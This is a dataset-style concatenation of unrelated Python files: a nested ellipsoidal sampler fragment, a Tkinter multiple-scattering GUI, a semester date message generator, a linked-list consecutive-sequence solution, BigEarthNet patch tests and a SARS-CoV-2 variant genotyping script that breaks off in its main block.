        # generate points
        pt = np.random.normal(0, 1, [npts, ndims])
        # get scalings for each point onto the surface of a unit hypersphere
        fac = np.sum(pt**2, axis=1)
        # calculate scaling for each point to be within the unit hypersphere
        # with radii rs
        fac = (rs**(1 / ndims)) / np.sqrt(fac)
        pnts = np.zeros((npts, ndims))
        # scale points to the ellipsoid using the eigen_values and rotate with
        # the eigen_vectors and add centroid
        d = np.sqrt(np.diag(e))
        d.shape = (ndims, 1)
        for i in range(0, npts):
            # scale points to a uniform distribution within unit hypersphere
            pnts[i, :] = fac[i] * pt[i, :]
            pnts[i, :] = np.dot(
                np.multiply(pnts[i, :], np.transpose(d)),
                np.transpose(v)
            ) + cent
        return pnts
    def name(self):
        """ See :meth:`pints.NestedSampler.name()`. """
        return 'Nested ellipsoidal sampler'
    def n_hyper_parameters(self):
        """ See :meth:`TunableMethod.n_hyper_parameters()`. """
        return 6
    def set_hyper_parameters(self, x):
        """
        The hyper-parameter vector is ``[# active points, # rejection samples,
        enlargement factor, ellipsoid update gap, dynamic enlargement factor,
        alpha]``.
        See :meth:`TunableMethod.set_hyper_parameters()`.
        """
        self.set_n_active_points(x[0])
        self.set_n_rejection_samples(x[1])
        self.set_enlargement_factor(x[2])
        self.set_ellipsoid_update_gap(x[3])
        self.set_dynamic_enlargement_factor(x[4])
        self.set_alpha(x[5])
| StarcoderdataPython |
3266707 | <reponame>DanPorter/Dans_Diffaction
"""
GUI for MultipleScattering code
"""
import sys, os
import matplotlib.pyplot as plt
import numpy as np
if sys.version_info[0] < 3:
import Tkinter as tk
else:
import tkinter as tk
from .. import functions_general as fg
from .. import functions_crystallography as fc
from .basic_widgets import StringViewer
from .basic_widgets import (TF, BF, SF, LF, HF, TTF, TTFG, TTBG,
bkg, ety, btn, opt, btn2,
btn_active, opt_active, txtcol,
btn_txt, ety_txt, opt_txt)
class MultipleScatteringGui:
    """
    Tkinter GUI to simulate multiple scattering for a crystal.
    Collects the reflection (hkl), azimuthal reference, polarisation
    vector, energy settings and run mode, then delegates the actual
    calculation and plotting to ``xtl.Plot``.
    """
    def __init__(self, xtl):
        """Build the window and all widgets for crystal object *xtl*."""
        self.xtl = xtl
        # Create Tk inter instance
        self.root = tk.Tk()
        self.root.wm_title('Multiple Scattering %s' % xtl.name)
        # self.root.minsize(width=640, height=480)
        self.root.maxsize(width=self.root.winfo_screenwidth(), height=self.root.winfo_screenheight())
        self.root.tk_setPalette(
            background=bkg,
            foreground=txtcol,
            activeBackground=opt_active,
            activeForeground=txtcol)
        frame = tk.Frame(self.root)
        frame.pack(side=tk.LEFT, anchor=tk.N)
        # Variables (Tk variables backing the entry widgets)
        # hkl, azir=[0, 0, 1], pv=[1, 0], energy_range=[7.8, 8.2], numsteps=60,
        # full=False, pv1=False, pv2=False, sfonly=True, pv1xsf1=False
        self.reflection_h = tk.IntVar(frame, 1)
        self.reflection_k = tk.IntVar(frame, 0)
        self.reflection_l = tk.IntVar(frame, 0)
        self.azir_h = tk.IntVar(frame, 0)
        self.azir_k = tk.IntVar(frame, 0)
        self.azir_l = tk.IntVar(frame, 1)
        self.pv_x = tk.IntVar(frame, 1)
        self.pv_y = tk.IntVar(frame, 0)
        self.energy_value = tk.DoubleVar(frame, 8)
        self.energy_range_width = tk.DoubleVar(frame, 0.1)
        self.numsteps = tk.IntVar(frame, 101)
        # Calculation modes; "sfonly" is the default selection below.
        self.run_modes = ["full", "pv1", "pv2", "sfonly", "pv1xsf1"]
        self.run_mode = tk.StringVar(frame, self.run_modes[3])
        # ---Line 1--- title banner
        line = tk.Frame(frame, bg=TTBG)
        line.pack(side=tk.TOP, fill=tk.X, expand=tk.YES, pady=5)
        var = tk.Label(line, text='Multiple Scattering by <NAME>', font=TTF, fg=TTFG, bg=TTBG)
        var.pack()
        # ---Line 2--- hkl / azir / pv entry fields
        line = tk.Frame(frame)
        line.pack(side=tk.TOP, fill=tk.X, expand=tk.YES, pady=5)
        # Reflection
        var = tk.Label(line, text='hkl:', font=LF)
        var.pack(side=tk.LEFT, padx=5)
        var = tk.Entry(line, textvariable=self.reflection_h, font=TF, width=2, bg=ety, fg=ety_txt)
        var.pack(side=tk.LEFT)
        var.focus() # set initial selection
        var.selection_range(0, tk.END)
        var = tk.Entry(line, textvariable=self.reflection_k, font=TF, width=2, bg=ety, fg=ety_txt)
        var.pack(side=tk.LEFT)
        var = tk.Entry(line, textvariable=self.reflection_l, font=TF, width=2, bg=ety, fg=ety_txt)
        var.pack(side=tk.LEFT)
        # Azir
        var = tk.Label(line, text='azir:', font=LF)
        var.pack(side=tk.LEFT, padx=5)
        var = tk.Entry(line, textvariable=self.azir_h, font=TF, width=2, bg=ety, fg=ety_txt)
        var.pack(side=tk.LEFT)
        var = tk.Entry(line, textvariable=self.azir_k, font=TF, width=2, bg=ety, fg=ety_txt)
        var.pack(side=tk.LEFT)
        var = tk.Entry(line, textvariable=self.azir_l, font=TF, width=2, bg=ety, fg=ety_txt)
        var.pack(side=tk.LEFT)
        # pv
        var = tk.Label(line, text='pv:', font=LF)
        var.pack(side=tk.LEFT, padx=5)
        var = tk.Entry(line, textvariable=self.pv_x, font=TF, width=2, bg=ety, fg=ety_txt)
        var.pack(side=tk.LEFT)
        var = tk.Entry(line, textvariable=self.pv_y, font=TF, width=2, bg=ety, fg=ety_txt)
        var.pack(side=tk.LEFT)
        # ---Line 3--- run-mode radio buttons
        line = tk.Frame(frame)
        line.pack(side=tk.TOP, pady=5)
        # run options
        for mode in self.run_modes:
            b = tk.Radiobutton(line, text=mode, variable=self.run_mode, value=mode, font=LF)
            b.pack(side=tk.LEFT, padx=3)
        # ---Line 4--- energy entry + azimuth plot button
        line = tk.Frame(frame)
        line.pack(side=tk.TOP, fill=tk.X, expand=tk.YES, pady=5)
        # energy
        var = tk.Label(line, text='Energy:', font=LF)
        var.pack(side=tk.LEFT, padx=5)
        var = tk.Entry(line, textvariable=self.energy_value, font=TF, width=8, bg=ety, fg=ety_txt)
        var.pack(side=tk.LEFT)
        # Run button
        var = tk.Button(line, text='Plot Azimuth', font=BF, command=self.fun_azimuth, width=10, bg=btn,
                        activebackground=btn_active)
        var.pack(side=tk.RIGHT, padx=5)
        # ---Line 5--- energy-scan controls + energy plot button
        line = tk.Frame(frame)
        line.pack(side=tk.TOP, fill=tk.X, expand=tk.YES, pady=5)
        # energy
        var = tk.Label(line, text='Energy Width:', font=LF)
        var.pack(side=tk.LEFT, padx=5)
        var = tk.Entry(line, textvariable=self.energy_range_width, font=TF, width=6, bg=ety, fg=ety_txt)
        var.pack(side=tk.LEFT)
        # numsteps
        var = tk.Label(line, text='Steps:', font=LF)
        var.pack(side=tk.LEFT, padx=5)
        var = tk.Entry(line, textvariable=self.numsteps, font=TF, width=4, bg=ety, fg=ety_txt)
        var.pack(side=tk.LEFT, padx=5)
        # Run button
        var = tk.Button(line, text='Plot Energy', font=BF, command=self.fun_energy, width=10, bg=btn,
                        activebackground=btn_active)
        var.pack(side=tk.RIGHT, padx=5)
    def fun_energy(self):
        """Run the multiple-scattering calculation over an energy scan
        centred on the 'Energy' value, then show the plot."""
        refh = self.reflection_h.get()
        refk = self.reflection_k.get()
        refl = self.reflection_l.get()
        hkl = [refh, refk, refl]
        azih = self.azir_h.get()
        azik = self.azir_k.get()
        azil = self.azir_l.get()
        azir = [azih, azik, azil]
        pv = [self.pv_x.get(), self.pv_y.get()]
        en = self.energy_value.get()
        wid = self.energy_range_width.get()
        # Symmetric scan window around the chosen energy.
        erange = [en-wid/2, en+wid/2]
        numsteps = self.numsteps.get()
        # Exactly one run-mode keyword is set True.
        modes = {mode: False for mode in self.run_modes}
        mode = self.run_mode.get()
        modes[mode] = True
        self.xtl.Plot.plot_multiple_scattering(hkl, azir, pv, erange, numsteps, **modes)
        plt.show()
    def fun_azimuth(self):
        """Run the multiple-scattering calculation as an azimuthal scan at
        the fixed 'Energy' value, then show the plot."""
        refh = self.reflection_h.get()
        refk = self.reflection_k.get()
        refl = self.reflection_l.get()
        hkl = [refh, refk, refl]
        azih = self.azir_h.get()
        azik = self.azir_k.get()
        azil = self.azir_l.get()
        azir = [azih, azik, azil]
        pv = [self.pv_x.get(), self.pv_y.get()]
        energy = self.energy_value.get()
        # Exactly one run-mode keyword is set True.
        modes = {mode: False for mode in self.run_modes}
        mode = self.run_mode.get()
        modes[mode] = True
        self.xtl.Plot.plot_ms_azimuth(hkl, energy, azir, pv, **modes)
        plt.show()
| StarcoderdataPython |
3371904 | <filename>capstone-project/sim_env.py
class SIMEnv(object):
    """Skeleton of a diet-simulation environment with a gym-like interface.
    All methods are unimplemented stubs."""
    def __init__(self, proxy_table):
        """ Initialise the environment with information from proxy_table """
        pass
    def step(self, action):
        """ Take an action, calculate the reward and return these informations """
        pass
    def reset(self):
        """ Reset the Environment to the initial state """
        pass
    def seed(self, seed=None):
        """ Define the Environment seed """
        pass
    def _take_action(self, action):
        """ Select all informations from proxy table (Fat, Carbo, Protein, Energy) """
        pass
    def _get_reward(self):
        """ Calculate the reward based on nutritional information """
        pass
| StarcoderdataPython |
1637602 | # <NAME>, <EMAIL>
# Code for Generating Semester 6 Dates
import datetime
from collections import defaultdict
from num2words import num2words
import re
# Month names in calendar order.  parse_txt() relies on
# ``MONTHS.index(name) + 1`` to recover the month number, so this tuple
# must contain exactly twelve separate entries.
MONTHS = (
    'January',
    'February',
    'March',
    'April',
    'May',
    'June',
    'July',
    'August',
    # BUG FIX: the original read ``'September,' 'October',`` -- the comma was
    # inside the string, so Python concatenated the adjacent literals into the
    # single element 'September,October', leaving an 11-entry tuple and
    # shifting the index (and thus the parsed month number) of every later
    # month.
    'September',
    'October',
    'November',
    'December'
)

# Semester tag used to build the input/output file names.
SEMESTER = "sp22"
def daterange(date1, date2):
    """Yield every date from *date1* through *date2*, inclusive.

    Yields nothing if *date2* is before *date1*.
    """
    span = (date2 - date1).days
    current = date1
    for _ in range(int(span) + 1):
        yield current
        current += datetime.timedelta(1)
def parse_txt(path):
    """Parse the academic-calendar text file at *path*.

    The file is assumed to alternate event-name lines with date lines such
    as "January 18, 2022" or ranges joined by " , " or " - ".  Returns a
    dict mapping each datetime.date covered by an event to the event name.
    NOTE(review): a date line is detected by containing any MONTHS entry --
    confirm the input format against the generated input files.
    """
    my_input = []
    with open(path, 'r') as f:
        for line in f:
            my_input.append(line.strip('\n'))
    # A line followed by a line containing a month name is treated as an
    # (event, date) pair.
    events = list()
    dates = list()
    for i in range(len(my_input) - 1):
        if any([m in my_input[i+1] for m in MONTHS]):
            events.append(my_input[i])
            dates.append(my_input[i+1])
    # print(events)
    # print(dates)
    # Split date ranges on either supported delimiter; single dates pass
    # through as a one-element list.
    delims = (' , ', ' - ')
    clean_dates = list()
    for event, date in zip(events, dates):
        datelist = list()
        for d in delims:
            if d in date:
                d0, d1 = date.split(d)
                datelist.append(d0)
                datelist.append(d1)
        if len(datelist) == 0:
            datelist.append(date)
        # print(event, datelist)
        clean_dates.append(datelist)
    retVal = defaultdict()
    for event, date_range in zip(events, clean_dates):
        # print(event)
        cdr = list()
        for date in date_range:
            # "Month DD, YYYY" -> (month_number, day, year); s_date[:-1]
            # drops the trailing comma after the day.
            s_month, s_date, s_year = date.split(' ')
            month = MONTHS.index(s_month) + 1
            day = int(s_date[:-1])
            year = int(s_year)
            cdr.append((month, day, year))
        start_dt = datetime.date(cdr[0][2], cdr[0][0], cdr[0][1])
        if len(cdr) == 2:
            end_dt = datetime.date(cdr[1][2], cdr[1][0], cdr[1][1])
        else:
            end_dt = start_dt
        # Expand the (possibly one-day) range into individual dates.
        for dt in daterange(start_dt, end_dt):
            # print(dt.strftime('%Y-%m-%d'))
            retVal[dt] = event
    return retVal
def school_day_diff(date1, date2, datedict=None):
    """Count school days from *date1* (earlier) to *date2* (later), inclusive.

    Weekends and any date present in *datedict* (holidays/breaks from
    parse_txt) are not counted.  If *date2* is before *date1*, returns the
    (negative) calendar-day distance instead, matching the original
    behaviour used for the pre-semester countdown.
    """
    if datedict is None:
        # BUG FIX: the original dereferenced ``datedict.keys()`` without a
        # None check, so calling with the default and date1 <= date2 raised
        # AttributeError.  An empty dict means "no holidays".
        datedict = {}
    if date1 > date2:
        # Negative distance for dates before the first day of class.
        return int((date2 - date1).total_seconds() / 86400)
    count = 1
    currdate = date2
    # Walk backwards from date2 to (but not including) date1, counting
    # weekdays that are not listed in datedict.
    while currdate != date1:
        if currdate not in datedict and currdate.weekday() < 5:
            count += 1
        currdate -= datetime.timedelta(1)
    return count
def dict_to_message(doc, days_after, abv=False):
    """Build the greeting for *days_after* days past day-of-class *doc*.

    *doc* is either an int (the school-day number, rendered as an ordinal
    word) or any other value, rendered as "last".  With ``abv`` True the
    phrase is abbreviated to a hashtag of word initials.
    """
    if isinstance(doc, int):
        doc_word = num2words(doc, lang='en', to='ordinal')
    else:
        doc_word = 'last'
    da_word = num2words(days_after, lang='en', to='cardinal')

    phrase = ''
    if days_after == 1:
        phrase += f'{da_word} day after the '
    if days_after >= 2:
        phrase += f'{da_word} days after the '
    phrase += f'{doc_word} day of class'

    if abv:
        # Collapse the phrase to a hashtag of upper-case initials.
        words = re.findall(r"[\w']+", phrase)
        phrase = '#' + ''.join(w[0].upper() for w in words)
    return 'Happy ' + phrase + "!"
def dict_to_before_message(doc):
    """Render the countdown message for a pre-semester offset.

    *doc* is the negative number of days until the first day of class.
    """
    remaining = -doc
    if remaining > 1:
        verb, suffix = 'are', 's'
    else:
        verb, suffix = 'is', ''
    return f'There {verb} {remaining} day{suffix} until the first day of class.'
def main():
    """Generate the per-date message files for the semester.

    Reads input/{SEMESTER}_input.txt, computes each date's school-day
    number (and how long any break has lasted), and writes abbreviated and
    long-form message files to output/.
    """
    d = parse_txt(f'input/{SEMESTER}_input.txt')
    fdoc = None
    ldoc = None
    # find first and last day of class from the parsed calendar events
    for k, v in d.items():
        if v == 'Courses begin':
            fdoc = k
        elif v == 'Courses end':
            ldoc = k
    # today = datetime.date.today()
    # Map every date of the semester to its school-day number.
    datedoc = defaultdict()
    starting = fdoc
    while starting != ldoc + datetime.timedelta(1):
        sdd = school_day_diff(fdoc, starting, d)
        datedoc[starting] = sdd
        starting += datetime.timedelta(1)
    # Augment each date with is_skip: how many consecutive days the
    # school-day count has not advanced (weekends/holidays).
    newdatedoc = defaultdict()
    is_skip = 0
    for i, (k, v) in enumerate(datedoc.items()):
        vi = 0
        if i != 0:
            vi = datedoc[k - datetime.timedelta(1)]
        if vi-v > -1:
            is_skip += 1
        else:
            is_skip = 0
        # print(k, v, is_skip)
        newdatedoc[k] = (v, is_skip)
    # print(newdatedoc)
    # Countdown values (negative day offsets) from New Year to the first day.
    before_datedoc = defaultdict()
    before_date = datetime.date(2022, 1, 1)
    while before_date != fdoc:
        sdd = school_day_diff(fdoc, before_date)
        before_datedoc[before_date] = sdd
        before_date += datetime.timedelta(1)
    # Abbreviated (hashtag) output: countdown lines then per-day messages.
    with open(f'output/{SEMESTER}_output.txt', 'w') as f:
        for k, v in before_datedoc.items():
            message = dict_to_before_message(v)
            # print(k, message)
            f.write(str(k) + " | " + message + '\n')
        for k, v in newdatedoc.items():
            abv = True
            if k != ldoc:
                message = dict_to_message(*v, abv)
            else:
                # The last day of class gets a special "last day" message.
                message = dict_to_message(ldoc, 0, abv)
            # print(k, message)
            f.write(str(k) + " | " + message + '\n')
    # Long-form output: same per-day messages, unabbreviated.
    with open(f'output/{SEMESTER}_output_long.txt', 'w') as f:
        for k, v in newdatedoc.items():
            abv = False
            if k != ldoc:
                message = dict_to_message(*v, abv)
            else:
                message = dict_to_message(ldoc, 0, abv)
            # print(k, message)
            f.write(str(k) + " | " + message + '\n')
# Script entry point: generate this semester's message files.
if __name__ == '__main__':
    main()
3348940 | <reponame>dexterchan/DailyChallenge
#You are given an array of integers. Return the length of the longest consecutive elements sequence in the array.
#For example, the input array [100, 4, 200, 1, 3, 2] has the longest consecutive sequence 1, 2, 3, 4, and thus, you should return its length, 4.
#Can you do this in linear time?
#Anaysis
#Sorting costs O(NlogN) , no good
# to archieve linear time, we need a linked list. creating double linked list on-the-fly of sorted number when scanning the array
# iterate the array
# create prev dict and next dict
# for each element, create a double linked node, say number 100
# insert 99->(node 100) into next dict
# insert 101 -> (node 100) into pre dict
# for next element, say 99 , find (node 100) in next dict,
# (node 99).next = (node 100), (node 99).prev = (node 100).prev, (node 99).prev.next = (node 99) , assign (node 100).prev to (node 99)
# also check 98 in prev dict, if not found , insert 98 -> (node 99) into prev dict
# in the end, we iterate double linked list, to find the longest consecutive sequence by O(N)
class dbNode:
    """Node of a doubly linked list holding a single value."""

    def __init__(self, val=None, prev=None, next=None):
        self.val = val
        self.prev = prev
        self.next = next

    def insert(self, node1, node2):
        """Splice *node2* into the list directly after *node1*.

        Note: written as an instance method but ignores ``self``; callers
        in this file invoke it as ``dbNode().insert(a, b)``.
        """
        tmpNode = node1.next
        node1.next = node2
        node2.prev = node1
        if tmpNode is not None:
            tmpNode.prev = node2
            node2.next = tmpNode

    def __str__(self):
        """Render the list from this node onward as ",v1,v2,..." (note the
        leading comma, preserved from the original format)."""
        s = ""
        n = self
        while n is not None:
            s = s + "," + str(n.val)
            n = n.next
        # BUG FIX: the original ended with ``return str``, returning the
        # builtin ``str`` type object instead of the accumulated string.
        return s
class Solution:
    """Find the longest run of consecutive integers in an array by
    threading each number into doubly linked lists built on the fly."""
    def longest_consecutive(self, nums):
        """Return (length, "v1,v2,...") for the longest consecutive chain.

        prevDict maps (value + 1) -> node, i.e. "a node that should come
        before value"; nextDict maps (value - 1) -> node, i.e. "a node that
        should come after value".  Each dummy head appended to ``anchor``
        starts a separate chain.
        NOTE(review): the splice logic below is intricate and assumes
        distinct input values -- verify with duplicates before relying on it.
        """
        prevDict = {}
        nextDict = {}
        anchor = []
        for n in nums:
            node = dbNode(n)
            if n in prevDict:
                # An existing node expects n as its successor: link after it.
                pNode = prevDict[n]
                dbNode().insert(pNode, node)
            else:
                # No predecessor known yet: start a new chain with a dummy head.
                dummy = dbNode(None)
                dbNode().insert(dummy, node)
                anchor.append(dummy)
            self.__insertNextDict(nextDict, node)
            if n in nextDict:
                # An existing node expects n as its predecessor.
                nNode = nextDict[n]
                if nNode.prev.val != None:
                    dbNode().insert(nNode.prev, node)
                else:
                    dbNode().insert(node, nNode)
            else:
                self.__insertPrevDict(prevDict, node)
        # Walk every chain from its dummy head and keep the longest one.
        maxLength = 0
        maxSeq = None
        for lt in anchor:
            ptr = lt.next
            l = 0
            s = []
            while ptr is not None:
                l += 1
                s.append(str(ptr.val))
                ptr = ptr.next
            if l > maxLength:
                maxLength = l
                maxSeq = ",".join(s)
        return maxLength, maxSeq
    def __insertPrevDict(self, prevDict, node):
        # Register: a node with value node.val + 1 should link before `node`.
        prevDict[node.val + 1] = node
    def __insertNextDict(self, nextDict, node):
        # Register: a node with value node.val - 1 should link after `node`.
        nextDict[node.val - 1] = node
def longest_consecutive(nums):
    """Module-level convenience wrapper around Solution.longest_consecutive."""
    return Solution().longest_consecutive(nums)
if __name__ == "__main__":
    # Smoke-test the solver on the examples from the problem statement.
    # BUG FIX: removed stray dataset-marker text that had been fused onto the
    # last line, which made it a syntax error.
    print(longest_consecutive([100, 4, 200, 1, 3, 2]))
    # 4
    print(longest_consecutive([5, 100, 4, 200, 7, 1, 3, 2, 6]))
1672918 | import numpy as np
import pytest
from bigearthnet_patch_interface.band_interface import Band
from bigearthnet_patch_interface.merged_interface import *
from bigearthnet_patch_interface.s1_interface import *
from bigearthnet_patch_interface.s2_interface import *
# Shared fixture: one random band per Sentinel-1 polarisation (VV/VH) and per
# Sentinel-2 spectral band at its native ground resolution (10/20/60 m).
# NOTE(review): the keyword "spatial_resoluion" (sic) is misspelled, but it
# must match the parameter name declared by random_ben_S2_band — confirm
# upstream before renaming.
TEST_BANDS = {
    "bandVV": random_ben_S1_band(),
    "bandVH": random_ben_S1_band(),
    "band02": random_ben_S2_band(spatial_resoluion=10),
    "band03": random_ben_S2_band(spatial_resoluion=10),
    "band04": random_ben_S2_band(spatial_resoluion=10),
    "band08": random_ben_S2_band(spatial_resoluion=10),
    "band05": random_ben_S2_band(spatial_resoluion=20),
    "band06": random_ben_S2_band(spatial_resoluion=20),
    "band07": random_ben_S2_band(spatial_resoluion=20),
    "band8A": random_ben_S2_band(spatial_resoluion=20),
    "band11": random_ben_S2_band(spatial_resoluion=20),
    "band12": random_ben_S2_band(spatial_resoluion=20),
    "band01": random_ben_S2_band(spatial_resoluion=60),
    "band09": random_ben_S2_band(spatial_resoluion=60),
}
def test_short_init_merged_patches():
    """short_init should accept per-band keyword args and expose their data."""
    s2_names = ["B01", "B02", "B03", "B04", "B05", "B06",
                "B07", "B08", "B8A", "B09", "B11", "B12"]
    # "B01" -> TEST_BANDS["band01"], "B8A" -> TEST_BANDS["band8A"], etc.
    bands = {name: TEST_BANDS["band" + name[1:]] for name in s2_names}
    bands["VV"] = TEST_BANDS["bandVV"]
    bands["VH"] = TEST_BANDS["bandVH"]

    ben_patch = BigEarthNet_S1_S2_Patch.short_init(**bands)

    for band_name, fixture_key in [("B02", "band02"), ("B05", "band05"),
                                   ("VV", "bandVV"), ("VH", "bandVH")]:
        assert (ben_patch.get_band_data_by_name(band_name)
                == TEST_BANDS[fixture_key]).all()
@pytest.mark.parametrize("name", ["B01", "B04", "B11", "VV"])
def test_band_by_name(name):
    """Each named band of a merged patch is returned as a Band instance."""
    ben_patch = BigEarthNet_S1_S2_Patch(**TEST_BANDS)
    # BUG FIX: the original evaluated isinstance() without asserting, so this
    # test could never fail regardless of the returned type.
    assert isinstance(ben_patch.get_band_by_name(name), Band)
def test_metadata():
    """Extra keyword metadata (labels) is stored on the constructed patch."""
    expected_labels = ["Marine waters"]
    ben_patch = BigEarthNet_S1_S2_Patch(labels=expected_labels, **TEST_BANDS)
    assert ben_patch.labels == expected_labels
# FUTURE: Write tests that check the printed output
| StarcoderdataPython |
1611886 | """
Checks a sample if it matches PHE defined recipes for VOC/VUIs. Outputs to stdout
a tab delimited list of the following:
- PHE name for the matching VOC/VUI. "none" if no match. "multiple" if multiple matches.
- pangolin name for the matching VOC/VUI. "none" if no match. "multiple" if multiple matches.
- confidence of the match. "NA" if no match. "multiple" if multiple matches.
- current time on system
Logs debugging information to stderr
"""
from csv import reader
from argparse import ArgumentParser
from yaml import full_load as load_yaml
from datetime import datetime
from sys import exit, stderr
import logging
from recipe_graph import RecipeDirectedGraph
from typing import Tuple
# Length (in bases) of the SARS-CoV-2 Wuhan reference genome; input sequences
# must be aligned to exactly this length.
WUHAN_REFERENCE_LENGTH = 29903

logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)

# Console handler writes to stderr so stdout stays clean for the TSV result.
# NOTE(review): the handler is only attached to the logger in the __main__
# block below, after its level is chosen from --verbose.
ch = logging.StreamHandler(stderr)
# Timestamped, human-readable format for every log record.
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# add formatter to ch
ch.setFormatter(formatter)
def get_recipe_match_confidence(recipe: dict, sequence: str, cached_results: dict) -> str:
    """
    Return the confidence ("confirmed", "probable" or "NA") that *sequence*
    matches the given PHE VOC/VUI *recipe*.

    A recipe lists defining SNP/MNP mutations (indels are skipped here) and
    calling thresholds. The sample gets "confirmed"/"probable" only if it
    passes the recipe's own thresholds AND every ancestral recipe named via
    the "requires" key also returns "confirmed" or "probable" (evaluated by
    calling this function recursively; a recipe is assumed to depend on at
    most one other recipe, and dependency cycles are NOT detected — a cycle
    would recurse forever).

    Recipe format: https://github.com/phe-genomics/variant_definitions

    Parameters
    ----------
    recipe : dict
        One PHE recipe with keys: unique-id, variants (each with
        one-based-reference-position, type, reference-base, variant-base and
        optional "special"), calling-definition, belongs-to-lineage,
        phe-label, and optionally requires.
    sequence : str
        Wuhan-aligned sample sequence: deletions padded with "-", insertions
        excised, so reference coordinates index directly into the string.
    cached_results : dict
        {recipe_name: confidence} for recipes already evaluated. Only READ
        here — the caller (find_all_matching_recipes) is responsible for
        populating it, and it only stores non-"NA" results.

    Returns
    -------
    str
        "confirmed", "probable" or "NA", ancestors taken into account.
    """
    recipe_name = recipe["unique-id"]
    if recipe_name in cached_results:
        logger.debug("Using cached results: " + cached_results[recipe_name])
        return cached_results[recipe_name]

    alt_match = 0
    ref_match = 0

    # if a "special mutation", e.g. E484K, is required but not present,
    # this flag is flipped to False and the recipe can no longer match
    special_mutations = True

    # Keep track of matched variants for logging
    log_alt_match = []
    log_ref_match = []
    log_wrong_alt = []

    pango_alias = "none"
    phe_label = "none"
    confidence = "NA"
    req_recipe_confidence = None

    # Compare the sample against every defining mutation of this recipe.
    for lineage_mutation in recipe['variants']:
        # Convert to 0-based indexing into the aligned sequence.
        pos = int(lineage_mutation['one-based-reference-position'])-1
        if lineage_mutation['type'] == "MNP":
            size = len(lineage_mutation['reference-base'])
            seq_val = sequence[pos:pos+size]
        elif lineage_mutation['type'] == "SNP":
            seq_val = sequence[pos]
        else:
            #not considering indels at present
            continue
        log_is_special = "_spec" if "special" in lineage_mutation else ""
        if seq_val == lineage_mutation['variant-base']:
            # Sample carries the defining (alt) allele.
            alt_match += 1
            log_alt_match.append("{}{}{}{}".format(
                lineage_mutation['reference-base'],
                lineage_mutation['one-based-reference-position'],
                seq_val,
                log_is_special
            ))
        elif seq_val == lineage_mutation['reference-base']:
            # Sample still carries the wildtype (reference) allele.
            ref_match += 1
            if "special" in lineage_mutation:
                special_mutations = False
            log_ref_match.append("{}{}{}".format(
                lineage_mutation['reference-base'],
                lineage_mutation['one-based-reference-position'],
                log_is_special))
        else:
            # Neither ref nor the expected alt (e.g. N, gap, or another base).
            if "special" in lineage_mutation:
                special_mutations = False
            log_wrong_alt.append("{}{}{}/{}{}".format(
                lineage_mutation['reference-base'],
                lineage_mutation['one-based-reference-position'],
                lineage_mutation['variant-base'],
                seq_val,
                log_is_special))

    # Apply the recipe's calling thresholds to the tallies above.
    calling_definition = recipe['calling-definition']
    confidence = "NA"
    pango_alias = recipe['belongs-to-lineage']['PANGO']
    phe_label = recipe['phe-label']
    if (special_mutations and
            alt_match >= calling_definition['confirmed']['mutations-required'] and
            ref_match <= calling_definition['confirmed']['allowed-wildtype']):
        confidence = "confirmed"
    elif ('probable' in calling_definition and
            special_mutations and
            alt_match >= calling_definition['probable']['mutations-required'] and
            ref_match <= calling_definition['probable']['allowed-wildtype']):
        confidence = "probable"

    # A dependent recipe only stands if its required (ancestral) recipe also
    # matches; otherwise the overall result is downgraded to "NA".
    overall_confidence = confidence
    if "requires" in recipe and confidence in ["confirmed", "probable"]:
        req_recipe_name = recipe["requires"]
        # NOTE(review): this reads the module-level global `recipes`
        # (populated in the __main__ block) rather than a parameter —
        # confirm before reusing this function as a library.
        req_recipe_pango_alias = recipes[req_recipe_name]['belongs-to-lineage']['PANGO']
        req_recipe_phe_label = recipes[req_recipe_name]['phe-label']
        logger.debug(f"Checking required recipe {req_recipe_name} - {req_recipe_pango_alias} " +
                     f"of dependent recipe {recipe_name} - {pango_alias} ")

        req_recipe_confidence = get_recipe_match_confidence(
            recipe=recipes[req_recipe_name],
            sequence=sequence,
            cached_results=cached_results)
        logger.debug(f"Required recipe pango: {req_recipe_pango_alias}" +
                     f", confidence: {req_recipe_confidence}" +
                     f", phe-label: {req_recipe_phe_label}" +
                     f" for reciped recipe {req_recipe_name} - {req_recipe_pango_alias} " +
                     f" of dependent recipe {recipe_name} - {pango_alias} ")

        if req_recipe_confidence not in ["confirmed", "probable"]:
            overall_confidence = "NA"

    if confidence in ["confirmed", "probable"]:
        logger.debug(f"Matched pango: {pango_alias} " +
                     f", confidence: {confidence} " +
                     f", overall-confidence: {overall_confidence} " +
                     f", phe-label: {phe_label}. " )
        logger.debug("Alt matches: " + ", ".join(log_alt_match))
        logger.debug("Ref matches: " + ", ".join(log_ref_match))
        logger.debug("Wrong Alt: " + ", ".join(log_wrong_alt))

    return overall_confidence
def find_all_matching_recipes(recipes: dict, sequence: str) -> Tuple[str, str, str]:
    """Evaluate every PHE VOC/VUI recipe against the sample and resolve the result.

    When several recipes match:
    - if they all lie on one branch of the recipe dependency graph (related
      lineages, e.g. AY.4.2 under B.1.617.2), report the leaf-most lineage;
    - otherwise report "multiple" for all three fields.

    Parameters
    ----------
    recipes : dict
        {recipe_name: recipe_dict}, as loaded from the recipes YAML.
    sequence : str
        Wuhan-aligned sample sequence (deletions padded, insertions excised).

    Returns
    -------
    (phe_label, pango_alias, confidence) : Tuple[str, str, str]
        "none"/"none"/"NA" when nothing matches, "multiple" across the board
        for conflicting matches.
    """
    # Evaluate each recipe once; matches double as the recursion cache.
    matches = {}
    for recipe in recipes.values():
        conf = get_recipe_match_confidence(
            recipe=recipe,
            sequence=sequence,
            cached_results=matches)
        if conf != "NA":
            matches[recipe["unique-id"]] = conf

    if not matches:
        return 'none', 'none', 'NA'

    if len(matches) == 1:
        (name, conf), = matches.items()
        single = recipes[name]
        return single['phe-label'], single['belongs-to-lineage']['PANGO'], conf

    # Several matches: decide whether they form a single lineage branch.
    graph = RecipeDirectedGraph([recipes[name] for name in matches])
    if graph.is_single_branch():
        leaf_name = graph.get_leaf_name()
        leaf = recipes[leaf_name]
        return leaf['phe-label'], leaf['belongs-to-lineage']['PANGO'], matches[leaf_name]

    logger.warning("Multiple matches " + str(graph))
    return "multiple", "multiple", "multiple"
if __name__ == "__main__":
    parser = ArgumentParser(description='Genotype an aligned sequence on specified variants of interest')
    parser.add_argument('fasta_filename', help="Single sample fasta, wuhan aligned")
    parser.add_argument('genotype_recipe_filename', help="Concatenated YAML of PHE VOC/VUI recipes")
    parser.add_argument("--verbose", help="increase output verbosity",
                        action="store_true")
    args = parser.parse_args()

